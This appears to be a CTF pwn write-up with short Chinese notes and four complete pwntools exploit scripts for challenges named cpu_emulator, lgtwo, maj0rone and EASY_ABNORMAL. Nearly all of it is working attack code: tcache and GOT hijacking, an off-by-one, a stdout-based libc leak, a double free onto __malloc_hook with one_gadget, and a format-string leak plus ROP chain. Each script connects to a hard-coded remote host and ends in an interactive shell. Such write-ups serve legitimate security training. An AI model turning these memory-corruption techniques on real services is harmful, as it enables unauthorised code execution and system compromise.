cpu_emulator
通过越界写劫持tcache数组,在其0x80和0x40的位置填入free的got表和atoi函数的got表地址,申请的时候将free_got劫持为printf泄露libc,而后将atoi函数的got表劫持为system函数,从而获取shell,需要注意的是本题是更新过的2.27libc,因此若是直接劫持会crash
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import struct
import sys

from pwn import *
#__Author__ = Cnitlrt
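context.log_level = 'debug'
binary = 'emulator'
elf = ELF('emulator')
libc = elf.libc  # libc resolved for the local loader; the remote build may differ
context.binary = binary
# 0: remote target, 1: local process, 2: target reached over ssh.
DEBUG = 0
if DEBUG == 2:
    # ssh() takes (user, host, port, password); pass every field by keyword
    # so the order cannot be mixed up.  Fill these in before use.
    host = ""
    port = 0
    user = ""
    passwd = ""
    p = ssh(user=user, host=host, port=port, password=passwd)
elif DEBUG:
    p = process(binary)
    # p = process(binary, env={"LD_PRELOAD": "./libc-2.27.so"})
else:
    host = "123.56.52.128"
    port = 18236
    p = remote(host, port)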
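def l64():
    """Receive up to the next 0x7f byte and unpack the 6 bytes before it as a u64."""
    return u64(p.recvuntil("\x7f")[-6:].ljust(8, "\x00"))


def l32():
    """Receive up to the next 0xf7 byte and unpack the 4 bytes before it as a u32."""
    return u32(p.recvuntil("\xf7")[-4:].ljust(4, "\x00"))


def sla(a, b):
    """sendlineafter(), with prompt and data both coerced to str."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """sendafter(), with prompt and data both coerced to str."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log *data* as a hex value labelled *name*."""
    return p.success(name + ": 0x%x" % data)


def se(payload):
    """Send *payload* unchanged."""
    return p.send(payload)


def rl():
    """Receive whatever is currently available."""
    return p.recv()


def sl(payload):
    """Send *payload* followed by a newline."""
    return p.sendline(payload)


def ru(a):
    """Receive up to and including str(*a*)."""
    return p.recvuntil(str(a))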
def cmd(idx):
    """Choose menu entry *idx* at the ">> " prompt."""
    p.sendlineafter(">> ", str(idx))
def opp(payload):
    """Menu 1: upload *payload* as the instruction stream, sized by its length."""
    p.sendlineafter(">> ", "1")
    p.sendlineafter("size:\n", str(len(payload)))
    p.sendafter("instruction:\n", str(payload))
def add1(size, payload):
    """Menu 1 with an explicit *size* rather than len(payload)."""
    p.sendlineafter(">> ", "1")
    p.sendlineafter("size:\n", str(size))
    p.sendafter("instruction:\n", str(payload))
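def _encode(opcode, idx, offset):
    """Pack one 32-bit instruction word for the emulator.

    Byte layout, lowest address first: 16-bit little-endian *offset*, one
    byte of register index *idx*, one *opcode* byte; the four bytes are read
    back as a little-endian u32.  A field that does not fit its width raises
    struct.error.
    """
    return struct.unpack("<I", struct.pack("<HBB", offset, idx, opcode))[0]


def add(idx, offset):
    """Opcode 0x20 on register *idx* with immediate *offset*."""
    return _encode(0x20, idx, offset)


def sub(idx, offset):
    """Opcode 0x24 on register *idx* with immediate *offset*."""
    return _encode(0x24, idx, offset)


def AND(idx, offset):
    """Opcode 0x30 on register *idx* with immediate *offset*."""
    return _encode(0x30, idx, offset)


def OR(idx, offset):
    """Opcode 0x34 on register *idx* with immediate *offset*."""
    return _encode(0x34, idx, offset)


def XOR(idx, offset):
    """Opcode 0x38 on register *idx* with immediate *offset*."""
    return _encode(0x38, idx, offset)


def SHIFT(idx, offset):
    """Opcode 0x3c on register *idx* with immediate *offset*."""
    return _encode(0x3c, idx, offset)


def read(idx, offset):
    """Opcode 0x8c on register *idx* with immediate *offset*."""
    return _encode(0x8c, idx, offset)


def write(idx, offset):
    """Opcode 0xac on register *idx* with immediate *offset*."""
    return _encode(0xac, idx, offset)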
"""
(0x3e00000 & a1) >> 21
(0x1f0000 & a1) >>16
(0xffff & a1)
"""
"""
reg[0] = 0xfffe0000
reg[0] = reg[0]+0xfdf0
reg[1] = 0x600000
reg[1] += reg[1]+0x2018
memory[reg[0]] = reg[1]
"""
free_got = 0x0000000000602018  # kept for reference; not referenced below

# Instruction stream assembled from the encoders above; it follows the
# pseudo-code in the comment block above (register setup, then stores).
program = [
    add(0x04, 0x10), add(0x05, 0x20), add(0x06, 0x60),
    add(0x09, 0x2),
    SHIFT(0x00, 0xffff), add(0x00, 0xfe20),
    write(0x04, 0), write(0x05, 1), write(0x06, 2),
    add(0x04, 0x58 - 0x20),
    SHIFT(0x00, 0xffff), add(0x00, 0xfe00),
    write(0x04, 0), write(0x05, 1), write(0x06, 2),
    SHIFT(0x00, 0xffff), add(0x00, 0xfdb0),
    write(0x09, 2), write(0x09, 6),
]
opp("".join(p32(insn) for insn in program))

# Dispatch notes recorded by the author:
#   rax = opcode >> 26
#   rdx = rax*4
#   eax = rdx+rax
#   rdx = [0x401404+rdx]
#   rax = 0x401404+[0x401404+4*(opcode >> 26)]
#   0x400ECD
#   b *0x400971
#   b *0x400A2D
cmd(2)
add1(0x78, p64(elf.plt["printf"]) * 2)
add1(0x68, "%9$p")
cmd(1)
ru("0x")
# 12 hex digits follow "0x"; 231 is the author's offset of the leaked return
# address from __libc_start_main and is specific to their libc build.
libc_base = int(p.recv(12), 16) - 231 - libc.sym["__libc_start_main"]
lg("libc_base", libc_base)
sla("size:\n", str(0x38))
sa("instruction:\n", p64(libc_base + libc.sym["system"]))
# add1(0x38, p64(libc_base + libc.sym["system"]))
# The menu input itself is the final step (see the write-up above).
cmd("sh")
# gdb.attach(p, """
# b *0x400eac
# """)
p.interactive()
lgtwo
off by one 没有show,劫持stdout泄露libc,double free劫持malloc_hook,one_gadget条件不满足,需要用libc_realloc调整栈帧
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
# context.log_level = 'debug'
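binary = 'pwn2'
elf = ELF('pwn2')
libc = elf.libc  # libc resolved for the local loader; the remote build may differ
context.binary = binary
# 0: remote target, 1: local process, 2: target reached over ssh.
DEBUG = 0
if DEBUG == 2:
    # ssh() takes (user, host, port, password); pass every field by keyword
    # so the order cannot be mixed up.  Fill these in before use.
    host = ""
    port = 0
    user = ""
    passwd = ""
    p = ssh(user=user, host=host, port=port, password=passwd)
elif DEBUG:
    p = process(binary)
    # p = process(binary, env={"LD_PRELOAD": "./libc-2.27.so"})
else:
    host = "123.56.52.128"
    port = 45830
    p = remote(host, port)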
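def l64():
    """Receive up to the next 0x7f byte and unpack the 6 bytes before it as a u64."""
    return u64(p.recvuntil("\x7f")[-6:].ljust(8, "\x00"))


def l32():
    """Receive up to the next 0xf7 byte and unpack the 4 bytes before it as a u32."""
    return u32(p.recvuntil("\xf7")[-4:].ljust(4, "\x00"))


def sla(a, b):
    """sendlineafter(), with prompt and data both coerced to str."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """sendafter(), with prompt and data both coerced to str."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log *data* as a hex value labelled *name*."""
    return p.success(name + ": 0x%x" % data)


def se(payload):
    """Send *payload* unchanged."""
    return p.send(payload)


def rl():
    """Receive whatever is currently available."""
    return p.recv()


def sl(payload):
    """Send *payload* followed by a newline."""
    return p.sendline(payload)


def ru(a):
    """Receive up to and including str(*a*)."""
    return p.recvuntil(str(a))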
def cmd(idx):
    """Choose menu entry *idx* at the ">> " prompt."""
    p.sendlineafter(">> ", str(idx))
def add(size, payload):
    """Menu 1: allocate *size* bytes and fill them with *payload*."""
    p.sendlineafter(">> ", "1")
    p.sendlineafter("size?\n", str(size))
    p.sendafter("content?\n", str(payload))
def free(idx):
    """Menu 2: release entry *idx*."""
    p.sendlineafter(">> ", "2")
    p.sendlineafter("index ?\n", str(idx))
def edit(idx, payload):
    """Menu 4: overwrite the contents of entry *idx* with *payload*."""
    p.sendlineafter(">> ", "4")
    p.sendlineafter("index ?\n", str(idx))
    p.sendafter("content ?\n", str(payload))
# Seven initial chunks, indices 0..6.
for sz in (0xf8, 0x68, 0xf8, 0xf8, 0x68, 0xf8, 0x68):
    add(sz, "aaaa")
free(0)
# One byte past the end of chunk 1, into chunk 2's header
# (the "off by one" the write-up above refers to).
edit(1, "a" * 0x60 + p64(0x70 + 0x100) + p8(0))
free(2)
add(0xf8, "aaaa")  # 0
add(0x68, "aaaa")  # 2 -> 1
add(0xf8, "aaaa")  # 7
free(0)
add(0x68, "aaaa")
add(0x68, "aaaa")  # 8
# Two-byte partial overwrite; per the write-up this is what redirects
# the chain toward stdout.
edit(8, p16(0x25dd))
free(0)
free(1)
edit(2, p8(0x70))
for _ in range(3):  # indices 0, 1, 9
    add(0x68, "aaa")
# Flags word 0xfbad1887, three zero words and one trailing byte: the
# stdout-based leak described in the write-up.
stdout_patch = "a" * 0x33 + p64(0xfbad1887) + p64(0) * 3 + p8(0x88)
edit(9, stdout_patch)
libc_base = l64() - libc.sym["_IO_2_1_stdin_"]
lg("libc_base", libc_base)
free(4)
free(0)
# -0x23 is the author's offset for this libc build; verify on any other build.
edit(2, p64(libc_base + libc.sym["__malloc_hook"] - 0x23))
add(0x68, "aaaa")
add(0x68, "aaaa")
# one_gadget candidates recorded by the author (offsets for their libc):
#   0x45226 execve("/bin/sh", rsp+0x30, environ)  constraints: rax == NULL
#   0x4527a execve("/bin/sh", rsp+0x30, environ)  constraints: [rsp+0x30] == NULL
#   0xf0364 execve("/bin/sh", rsp+0x50, environ)  constraints: [rsp+0x50] == NULL
#   0xf1207 execve("/bin/sh", rsp+0x70, environ)  constraints: [rsp+0x70] == NULL
one_gadget = libc_base + 0x4527a
hook_patch = "a" * (0x13 - 0x8) + p64(one_gadget) + p64(libc_base + libc.sym["__libc_realloc"] + 0x8)
edit(4, hook_patch)
# A further allocation request is the final step (realloc adjusts the frame,
# as the write-up says).
cmd(1)
p.recv()
p.sendline(str(0x100))
# gdb.attach(p)
p.interactive()
maj0rone
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: cnitlrt
import sys
import os
from pwn import *
# context.lo1
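context.log_level = 'debug'
binary = 'maj'
elf = ELF('maj')
libc = elf.libc  # libc resolved for the local loader; the remote build may differ
context.binary = binary
# 0: remote target, 1: local process, 2: target reached over ssh.
DEBUG = 0
if DEBUG == 2:
    # ssh() takes (user, host, port, password); pass every field by keyword
    # so the order cannot be mixed up.  Fill these in before use.
    host = ""
    port = 0
    user = ""
    passwd = ""
    p = ssh(user=user, host=host, port=port, password=passwd)
elif DEBUG:
    p = process(binary)
    # p = process(binary, env={"LD_PRELOAD": "./libc-2.27.so"})
else:
    host = "123.56.52.128"
    port = 18523
    p = remote(host, port)
# Offsets recorded by the author for their libc build.  Only o_g[3] is used
# below; `magic` is not referenced in this script.
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
magic = [0x3c4b10, 0x3c67a8, 0x846c0, 0x45390]  # malloc, free, realloc, system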
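def l64():
    """Receive up to the next 0x7f byte and unpack the 6 bytes before it as a u64."""
    return u64(p.recvuntil("\x7f")[-6:].ljust(8, "\x00"))


def l32():
    """Receive up to the next 0xf7 byte and unpack the 4 bytes before it as a u32."""
    return u32(p.recvuntil("\xf7")[-4:].ljust(4, "\x00"))


def sla(a, b):
    """sendlineafter(), with prompt and data both coerced to str."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """sendafter(), with prompt and data both coerced to str."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log *data* as a hex value labelled *name*."""
    return p.success(name + ": 0x%x" % data)


def se(payload):
    """Send *payload* unchanged."""
    return p.send(payload)


def rl():
    """Receive whatever is currently available."""
    return p.recv()


def sl(payload):
    """Send *payload* followed by a newline."""
    return p.sendline(payload)


def ru(a):
    """Receive up to and including str(*a*)."""
    return p.recvuntil(str(a))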
def cmd(idx):
    """Choose menu entry *idx* at the ">> " prompt."""
    p.sendlineafter(">> ", str(idx))
def add(size, payload):
    """Menu 1: answer the question with 80, then allocate *size* bytes of *payload*."""
    p.sendlineafter(">> ", "1")
    p.sendlineafter('please answer the question\n', "80")
    p.sendlineafter("______?\n", str(size))
    p.sendafter("yes_or_no?\n", str(payload))
def free(idx):
    """Menu 2: release entry *idx*."""
    p.sendlineafter(">> ", "2")
    p.sendlineafter("index ?\n", str(idx))
def show(idx):
    """Menu 3: display entry *idx*."""
    p.sendlineafter(">> ", "3")
    p.sendlineafter("index ?\n", str(idx))
def edit(idx, payload):
    """Menu 4: overwrite the contents of entry *idx* with *payload*."""
    p.sendlineafter(">> ", "4")
    p.sendlineafter("index ?\n", str(idx))
    p.sendafter("__new_content ?\n", str(payload))
add(0x28, "0")  # 0
for _ in range(4):  # 1..4
    add(0x68, "0")
edit(0, p64(0) + p64(0x71))
fake_hdr = p64(0) + p64(0x21)
edit(1, fake_hdr * 6)
free(2)
free(1)
edit(1, '\x10')  # one-byte partial overwrite
add(0x68, "1")  # 5
add(0x68, "1")  # 6
size_patch = p64(0) * 3 + p64(0x70 + 0x71)
edit(6, size_patch)
free(1)
add(0x68, "a")  # 7
add(0x68, "a")  # 8 -> 2
edit(6, size_patch)
free(1)
free(2)
add(0x38, "a")  # 9
add(0x28, "a")  # 10
edit(8, p16(0x25dd))  # two-byte partial overwrite
add(0x68, "a")  # 11
add(0x68, "12")  # 12
# Flags word 0xfbad1887, three zero words and one trailing byte; the leak
# then comes back through stdout.
edit(12, "a" * 0x33 + p64(0xfbad1887) + p64(0) * 3 + p8(0))
# Fixed distance from the leaked pointer to the libc base; tied to the
# author's libc build, verify on any other.
libc_base = l64() - 0x3c5600
lg("libc_base", libc_base)
free(3)
# -0x23 is the author's offset for this libc build.
edit(3, p64(libc_base + libc.sym["__malloc_hook"] - 0x23))
add(0x68, "a")  # 13
add(0x68, "14")  # 14
edit(14, "a" * 0x13 + p64(o_g[3] + libc_base))
# One more allocation request is the final step.
cmd(1)
sla('please answer the question\n', str(80))
sla("______?\n", str(80))
# gdb.attach(p)
p.interactive()
EASY_ABNORMAL
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
#context.log_level = 'debug'
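binary = 'pwn111'
elf = ELF('pwn111')
libc = elf.libc  # libc resolved for the local loader; the remote build may differ
context.binary = binary
# 0: remote target, 1: local process, 2: target reached over ssh.
DEBUG = 0
if DEBUG == 2:
    # ssh() takes (user, host, port, password); pass every field by keyword
    # so the order cannot be mixed up.  Fill these in before use.
    host = ""
    port = 0
    user = ""
    passwd = ""
    p = ssh(user=user, host=host, port=port, password=passwd)
elif DEBUG:
    p = process(binary)
    # p = process(binary, env={"LD_PRELOAD": "./libc-2.27.so"})
else:
    host = "123.56.52.128"
    port = 10012
    p = remote(host, port)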
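def l64():
    """Receive up to the next 0x7f byte and unpack the 6 bytes before it as a u64."""
    return u64(p.recvuntil("\x7f")[-6:].ljust(8, "\x00"))


def l32():
    """Receive up to the next 0xf7 byte and unpack the 4 bytes before it as a u32."""
    return u32(p.recvuntil("\xf7")[-4:].ljust(4, "\x00"))


def sla(a, b):
    """sendlineafter(), with prompt and data both coerced to str."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """sendafter(), with prompt and data both coerced to str."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log *data* as a hex value labelled *name*."""
    return p.success(name + ": 0x%x" % data)


def se(payload):
    """Send *payload* unchanged."""
    return p.send(payload)


def rl():
    """Receive whatever is currently available."""
    return p.recv()


def sl(payload):
    """Send *payload* followed by a newline."""
    return p.sendline(payload)


def ru(a):
    """Receive up to and including str(*a*)."""
    return p.recvuntil(str(a))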
def cmd(idx):
    """Choose menu entry *idx* at the "E :" prompt."""
    p.sendlineafter("E :", str(idx))
def add(payload):
    """Menu 2: store *payload* as a new entry (sent as a line)."""
    p.sendlineafter("E :", "2")
    p.sendlineafter("cnt:\n", str(payload))
def free(idx):
    """Menu 3: release entry *idx*."""
    p.sendlineafter("E :", "3")
    p.sendlineafter("idx:", str(idx))
def show(idx):
    """Menu 4: print the entries.

    *idx* is accepted for symmetry with free() but is never sent; the
    caller below reads the line labelled "2:" from the output.
    """
    p.sendlineafter("E :", "4")
def gift(payload):
    """Hidden menu entry 23333: send *payload* raw at the "INPUT:" prompt."""
    p.sendlineafter("E :", "23333")
    p.sendafter("INPUT:", str(payload))
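# Format-string read of one stack slot via the name prompt.
sla("NAME: ", "%11$p")
cmd(1)
ru("0x")
# 12 hex digits follow "0x"; 240 is the author's offset of the leaked return
# address from __libc_start_main and is specific to their libc build.
libc_base = int(p.recv(12), 16) - 240 - libc.sym["__libc_start_main"]
lg("libc_base", libc_base)
pop_rdi = libc_base + 0x21112  # gadget offset recorded by the author for their libc
sys_addr = libc_base + libc.sym['system']
# next() works on Python 2 and 3; the generator's .next() method is Python 2 only.
sh_addr = libc_base + next(libc.search("/bin/sh"))
ret = libc_base + 0x0937
chain = [ret] * 6 + [pop_rdi, sh_addr, sys_addr]
payload = "".join(p64(addr) for addr in chain)
add(payload)
add(payload)
free(0)
free(1)
show(1)
ru("2:")
# The rest of the "2:" line, minus the newline, read as a little-endian u64.
heap_base = u64(ru("\n")[:-1].ljust(8, "\x00"))
lg("heap_base", heap_base)
# gdb.attach(p)
gift("a" * 0x20 + p64(heap_base + 0x20))
p.interactive()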